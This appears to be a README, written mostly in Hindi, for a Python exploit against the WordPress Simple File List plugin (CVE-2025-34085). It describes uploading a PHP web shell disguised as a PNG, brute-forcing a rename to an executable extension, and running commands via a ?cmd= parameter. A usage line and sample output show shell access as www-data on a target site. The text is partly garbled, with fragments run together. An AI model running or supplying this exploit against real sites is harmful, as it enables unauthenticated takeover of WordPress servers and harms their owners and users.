
Simple File List – बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट (CVE-2025-34085)
⚠️ शोषण कोड द्वारा: Mrj Haxcore
WordPress Simple File List प्लगइन (<= 4.2.3) के लिए एक पूरी तरह काम करने वाला Python शोषण, जो असुरक्षित फ़ाइल अपलोड और नाम बदलने के तर्क के कारण अप्रमाणित दूरस्थ कोड निष्पादन (RCE) के लिए कमजोर है।
simple-file-list).png के रूप में छिपी एक PHP फ़ाइल अपलोड कर सकते हैं, फिर इसे .php में बदल सकते हैं और मनमाना कोड निष्पादित कर सकते हैं।multipart/form-data निर्माता (415 को बायपास करता है).php, .php5, .phtml आदि के लिए नाम बदलने का ब्रूट-फोर्स?cmd= के माध्यम से कमांड निष्पादन�PNG कचरा नहीं)python3 simple.py https://target.site
[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Manual Visit
https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami